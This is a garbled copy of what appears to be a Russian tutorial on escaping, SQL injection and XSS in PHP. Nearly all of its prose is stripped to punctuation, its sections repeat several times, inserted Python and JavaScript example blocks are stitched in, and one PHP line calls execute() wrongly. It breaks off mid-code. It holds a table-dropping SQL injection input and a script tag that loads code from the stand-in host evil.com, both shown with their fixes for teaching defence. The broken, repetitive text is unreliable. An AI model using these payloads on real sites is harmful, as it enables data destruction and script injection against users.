, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
      

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]); // PDOStatement::execute() takes the bound values as an array





, . , .
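An added example, not code from the original article and written in Python rather than the article's PHP: it runs the article's three inputs (Alex, Mc'Donalds, Joe'; DROP TABLE users; --) against an in-memory SQLite table the three ways the article describes, naive interpolation, manual escaping that imitates mysql_real_escape_string, and a bound parameter, and then does the HTML-side job of htmlspecialchars with html.escape. The users table, its phone numbers and the use of the sqlite3 driver are assumptions of the example.

```python
import html
import sqlite3

# The three inputs the article walks through; the third is the article's own
# injection example, kept here only to show what each defence does with it.
INPUTS = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]

# Constructed sample rows (not from the article).
SAMPLE_ROWS = [("Alex", "555-0100"), ("Mc'Donalds", "555-0101")]


def build_query_naive(name: str) -> str:
    """String interpolation, exactly as the article's vulnerable PHP does it."""
    return f"SELECT phone_number FROM users WHERE name = '{name}'"


def escape_sql_literal(name: str) -> str:
    """Backslash-escape quote and backslash, imitating what
    mysql_real_escape_string does to those two characters (the article's
    output 'Mc\\'Donalds'). SQLite itself doubles quotes ('') instead, so
    this string is for comparison with the article, not for running."""
    return name.replace("\\", "\\\\").replace("'", "\\'")


def build_query_escaped(name: str) -> str:
    """The article's second attempt: escape first, then interpolate."""
    return f"SELECT phone_number FROM users WHERE name = '{escape_sql_literal(name)}'"


def fresh_db() -> sqlite3.Connection:
    """In-memory users table holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone_number TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def table_exists(conn: sqlite3.Connection) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'users'"
    ).fetchone()
    return row is not None


def run_naive(name: str) -> str:
    """Hand the interpolated query to the driver. Returns 'ok' when it ran,
    otherwise the name of the exception the driver raised: a legitimate
    apostrophe (Mc'Donalds) already breaks the statement, and the injection
    input turns one statement into two, which sqlite3's execute() refuses."""
    conn = fresh_db()
    try:
        conn.execute(build_query_naive(name)).fetchall()
        return "ok"
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return type(exc).__name__


def lookup_parameterized(name: str):
    """The article's prepared-statement fix: the name travels as a bound
    parameter and is never parsed as SQL. Returns (phone or None, table_ok)."""
    conn = fresh_db()
    row = conn.execute(
        "SELECT phone_number FROM users WHERE name = ?", (name,)
    ).fetchone()
    return (row[0] if row else None, table_exists(conn))


def render_post_body(body: str) -> str:
    """Output encoding for the HTML context, the job the article gives to
    htmlspecialchars(): <, >, & and quotes become entities, so the post
    body is shown as text instead of being parsed as markup."""
    return html.escape(body, quote=True)


if __name__ == "__main__":
    for name in INPUTS:
        print(build_query_naive(name))
        print(build_query_escaped(name))
        print("naive driver result:", run_naive(name))
        print("parameterized:", lookup_parameterized(name))
    print(render_post_body('<script src="http://evil.com/dangerous.js"></script>'))
```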





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).













, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .

Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
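The three contexts the article walks through, side by side, as an added JavaScript example (not code from the original article): an HTML escaper equivalent to htmlspecialchars, the backslash escaping for JavaScript string literals, and a constructed stand-in for mysql_real_escape_string, all run over the article's own inputs, plus one helper that applies the HTML escaper to the SQL input to show the context mismatch the article warns about. Function names are my own, and the SQL escaper is a teaching approximation rather than a replacement for the driver's escaper or for prepared statements.

```javascript
// Added example, not code from the original article. Function names are
// my own; the inputs are the ones the article uses.

// HTML text/attribute context, equivalent to PHP's htmlspecialchars():
// '&' must be handled first, or the '&' in the freshly produced '&lt;'
// would be escaped a second time.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// Double-quoted JavaScript string literal context: the escape character
// itself is escaped first, then the quote.
function escapeJsString(text) {
  return String(text)
    .replace(/\\/g, '\\\\')
    .replace(/"/g, '\\"');
}

// Single-quoted SQL string literal context, a constructed stand-in for
// mysql_real_escape_string() covering only the characters the article
// exercises (a real driver also handles NUL, newlines and charset issues).
function escapeSqlLiteral(text) {
  return String(text)
    .replace(/\\/g, '\\\\')
    .replace(/'/g, "\\'");
}

// The article's post template with every interpolation escaped for HTML.
function renderPost(username, when, body) {
  return '<div class="post"> <p class="meta"> Posted by ' + escapeHtml(username) +
    ' on ' + escapeHtml(when) + ' </p> <p class="body"> ' + escapeHtml(body) +
    ' </p> </div>';
}

// The article's phone-number query with the name escaped for SQL.
function buildQuery(name) {
  return "SELECT phone_number FROM users WHERE name = '" + escapeSqlLiteral(name) + "'";
}

// Same query built with the wrong escaper: HTML escaping leaves the
// single quote alone, so the string literal is still terminated early.
function buildQueryWrongContext(name) {
  return "SELECT phone_number FROM users WHERE name = '" + escapeHtml(name) + "'";
}

// The prepared-statement shape: query text and value are never concatenated,
// so no escaping of the value is needed at all.
function buildParameterizedQuery(name) {
  return { sql: 'SELECT phone_number FROM users WHERE name = ?', params: [name] };
}

// Constructed sample inputs, taken from the article's own examples.
const SCRIPT_POST = '<script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>';
const INJECTION_NAME = "Joe'; DROP TABLE users; --";

console.log(renderPost('JackTR', 'July 18, 12:56', SCRIPT_POST));
console.log(buildQuery("Mc'Donalds"));
console.log(buildQuery(INJECTION_NAME));
console.log(buildQueryWrongContext(INJECTION_NAME));
console.log(escapeJsString('Plato is said to once have said "Lorem ipsum dolor sit amet".'));
console.log(buildParameterizedQuery(INJECTION_NAME));
```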













... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?>
<article>
  <author>Homo Sapiens</author>
  <contents>
    Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y.
  </contents>
</article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - "&amp;", .. : "&amp;&lt;"





XML - "" . , :

var name = "Homo Sapiens";
var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens";
var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens";
var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens";
var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'";
$result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name'];
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Input: Alex
Query: SELECT phone_number FROM users WHERE name = 'Alex'

Input: Mc'Donalds
Query: SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Input: Joe'; DROP TABLE users; --
Query: SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post">
  <p class="meta">
    Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo $post['body']; ?>
  </p>
</div>





, , :

<div class="post">
  <p class="meta">
    Posted by Plato on January 2, 15:31
  </p>
  <p class="body">
    I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
  </p>
</div>





, , , , :

<div class="post">
  <p class="meta">
    Posted by Pascal on November 23, 04:12
  </p>
  <p class="body">
    Basic math tells us that if x < n and y > n, x cannot be larger than y.
  </p>
</div>





... . , , , ?



<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
  </p>
</div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name'];
$name = mysql_real_escape_string($name);
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);





, "" . SQL-, :

Input: Alex
Query: SELECT phone_number FROM users WHERE name = 'Alex'

Input: Mc'Donalds
Query: SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Input: Joe'; DROP TABLE users; --
Query: SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body']); ?>
  </p>
</div>





htmlspecialchars



, , . :

<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
  </p>
</div>





, , , "". HTML .
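An added example (not the article's code), in Python rather than the article's JavaScript and PHP, that serves the earlier XML passage on escaping "&" itself, the JavaScript backslash passage, and the htmlspecialchars output just above: one escaper per context, the double-escaping bug when "&" is handled last, and the post template rendered with every value escaped. The sample strings are the article's own; render_post and its preformatted date argument are assumptions.

```python
import html
import json

# Sample strings are the article's own; the script post is the payload the
# article shows being neutralised by htmlspecialchars.
MATH_TEXT = "Basic math tells us that if x < n and y > n, x cannot be larger than y."
PLATO_TEXT = 'Plato is said to once have said "Lorem ipsum dolor sit amet".'
SCRIPT_POST = ('<script src="http://evil.com/dangerous.js" '
               'type="text/javascript" charset="utf-8"></script>')


def escape_markup(text):
    """Escape for XML/HTML text content or a double-quoted attribute.
    '&' is the escape character itself, so it goes first; replacing it after
    '<' would turn the freshly produced '&lt;' into '&amp;lt;'."""
    return (text.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace('"', "&quot;"))


def escape_markup_wrong_order(text):
    """The same replacements with '&' last: the double-escaping bug."""
    return (text.replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace('"', "&quot;")
                .replace("&", "&amp;"))


def unescape_markup(text):
    """Inverse of escape_markup; '&amp;' is resolved last for the same reason."""
    return (text.replace("&quot;", '"')
                .replace("&gt;", ">")
                .replace("&lt;", "<")
                .replace("&amp;", "&"))


def matches_stdlib_html_escape(text):
    """Cross-check against html.escape (which additionally escapes the apostrophe,
    so the comparison holds for inputs without one)."""
    return escape_markup(text) == html.escape(text, quote=True)


def escape_js_string(text):
    """Escape for the inside of a double-quoted JavaScript string literal.
    The backslash is the escape character, so it is doubled first; then each
    quote gets a backslash, as in the article's last `var contents` line."""
    return text.replace("\\", "\\\\").replace('"', '\\"')


def js_literal(text):
    """Complete literal for the right-hand side of `var contents = ...;`."""
    return '"' + escape_js_string(text) + '"'


def js_literal_matches_json(text):
    """For plain printable ASCII, json.dumps produces the same JS literal."""
    return js_literal(text) == json.dumps(text)


def render_post(username, date_str, body):
    """The article's post template with every dynamic value escaped for HTML.
    date_str is assumed preformatted (the PHP date() call in the original)."""
    return ('<div class="post">\n'
            '  <p class="meta">Posted by {user} on {date}</p>\n'
            '  <p class="body">{body}</p>\n'
            '</div>').format(user=escape_markup(username),
                             date=escape_markup(date_str),
                             body=escape_markup(body))
```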



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .

Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]); // execute() takes an array of parameter values, one per placeholder





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
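The article's three inputs (Alex, Mc'Donalds, Joe'; DROP TABLE users; --) run through string concatenation, through quote escaping, and through a prepared statement, as an added example that is not the article's code, written in Python with sqlite3 rather than the article's PHP and MySQL so it runs stand-alone. The users table and phone numbers are constructed, and sql_escape (quote doubling) stands in for mysql_real_escape_string.

```python
import sqlite3

# Constructed sample inputs: the three names the article feeds into the query.
INPUTS = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]


def fresh_db():
    """In-memory database with a constructed users table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone_number TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Alex", "555-0100"), ("Mc'Donalds", "555-0101")])
    return conn


def concatenated_query(name):
    """The article's first version: the input is pasted into the SQL text, so
    the database cannot tell where the data ends and the code resumes."""
    return "SELECT phone_number FROM users WHERE name = '" + name + "'"


def sql_escape(name):
    """Escape for a single-quoted SQL literal by doubling the quote: the
    standard-SQL counterpart of the backslash mysql_real_escape_string adds."""
    return name.replace("'", "''")


def run_concatenated(conn, name):
    """Returns ("ok", rows) or ("error", message). A legitimate apostrophe
    breaks the statement; the Joe input turns it into two statements, which
    this driver refuses to run through a single execute()."""
    try:
        return "ok", conn.execute(concatenated_query(name)).fetchall()
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return "error", str(exc)


def run_escaped(conn, name):
    """With escaping, every input is a plain literal again: the apostrophe in
    Mc'Donalds and the whole Joe payload are just characters of a name."""
    return conn.execute(concatenated_query(sql_escape(name))).fetchall()


def run_prepared(conn, name):
    """Prepared statement: the SQL text is fixed and the value travels
    separately, so there is no escaping step to forget or to apply to the
    wrong context."""
    return conn.execute(
        "SELECT phone_number FROM users WHERE name = ?", (name,)).fetchall()


def users_table_exists(conn):
    """True while the users table survives in the schema catalogue."""
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = 'users'"
    ).fetchone()
    return row[0] == 1


if __name__ == "__main__":
    db = fresh_db()
    for name in INPUTS:
        print(repr(name))
        print("  concatenated:", run_concatenated(db, name))
        print("  escaped:     ", run_escaped(db, name))
        print("  prepared:    ", run_prepared(db, name))
    print("users table still present:", users_table_exists(db))
```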

















mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
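The forum-post rendering from the XSS section, with and without the escaper, as an added example that is not code from the original article. Python's `html.escape` stands in for the page's `htmlspecialchars`, and a small `HTMLParser` subclass lists the tags a browser would actually see, so the effect of escaping, and of escaping for the wrong context as the previous paragraph warns against, is checkable rather than eyeballed. The posts are constructed samples built from the article's three examples; the years in the dates are made up.

```python
"""Rendering the article's forum posts with and without the HTML escaper.

Added example, not code from the original article. html.escape plays the
role of htmlspecialchars; TagCollector reports which tags a parser sees.
The posts are constructed samples based on the article's examples.
"""
import html
from datetime import datetime
from html.parser import HTMLParser

POSTS = [
    {"username": "Plato", "date": datetime(2013, 1, 2, 15, 31),
     "body": 'I am said to have said "Lorem ipsum dolor sit amet".'},
    {"username": "Pascal", "date": datetime(2013, 11, 23, 4, 12),
     "body": "Basic math tells us that if x < n and y > n, "
             "x cannot be larger than y."},
    {"username": "JackTR", "date": datetime(2013, 7, 18, 12, 56),
     "body": '<script src="http://evil.com/dangerous.js" '
             'type="text/javascript" charset="utf-8"></script>'},
]

TEMPLATE = ('<div class="post"> <p class="meta"> Posted by {user} on {date} </p> '
            '<p class="body"> {body} </p> </div>')


def fmt_date(d: datetime) -> str:
    """Same shape as the page's date('F j, H:i'): 'July 18, 12:56'."""
    return f"{d.strftime('%B')} {d.day}, {d.strftime('%H:%M')}"


def render_unescaped(post) -> str:
    """The article's vulnerable template: user text is emitted as markup."""
    return TEMPLATE.format(user=post["username"], date=fmt_date(post["date"]),
                           body=post["body"])


def render_escaped(post) -> str:
    """The fixed template: every user-controlled value goes through the
    HTML escaper at the point where it is written into HTML."""
    return TEMPLATE.format(user=html.escape(post["username"]),
                           date=fmt_date(post["date"]),
                           body=html.escape(post["body"]))


def render_sql_escaped(post) -> str:
    """Wrong tool for the context: SQL-style quote doubling from the
    database section does nothing to '<' or '"' in HTML."""
    return TEMPLATE.format(user=post["username"], date=fmt_date(post["date"]),
                           body=post["body"].replace("'", "''"))


class TagCollector(HTMLParser):
    """Records every start tag the parser sees in a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup: str) -> list:
    """Tag names a browser-like parser would find in the markup."""
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


if __name__ == "__main__":
    for post in POSTS:
        print(tags_in(render_unescaped(post)), "->", tags_in(render_escaped(post)))
```

The escaper is applied at the boundary where the value is written into HTML, not when it is stored: a name saved as `Mc&#x27;Donalds` would no longer match a database lookup for the real name, which is the storage-side version of the same context mismatch.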





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .

Sanitization

"" , . , - HTML-, . , .
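Validation and sanitization, the two companions to escaping named in the headings above, as an added example that is not code from the original article. Validation rejects input that does not have the expected shape before any query is built ("42" passes, "DROP TABLE users" never gets near SQL); sanitization keeps a chosen subset of HTML and escapes everything else. The allow-list (`<b>`, `<i>`, `<br>`, no attributes) is an assumption of this example, not anything the article prescribes.

```python
"""Validation and sanitization, the article's two companions to escaping.

Added example, not code from the original article. The allow-list of
tags is an assumption made here for illustration.
"""
import html
import re
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "br"}   # assumed allow-list for this example
VOID_TAGS = {"br"}                # tags that take no closing tag


def validate_user_id(raw: str):
    """Return the id as an int, or None when the text is not a plain number.

    The explicit [0-9] is deliberate: \\d also matches other Unicode digit
    characters, and int() would accept those as well.
    """
    if re.fullmatch(r"[0-9]{1,9}", raw):
        return int(raw)
    return None


class AllowListSanitizer(HTMLParser):
    """Rebuilds a fragment keeping only allow-listed, attribute-free tags.

    Text (entities included, since the parser decodes them) is re-escaped
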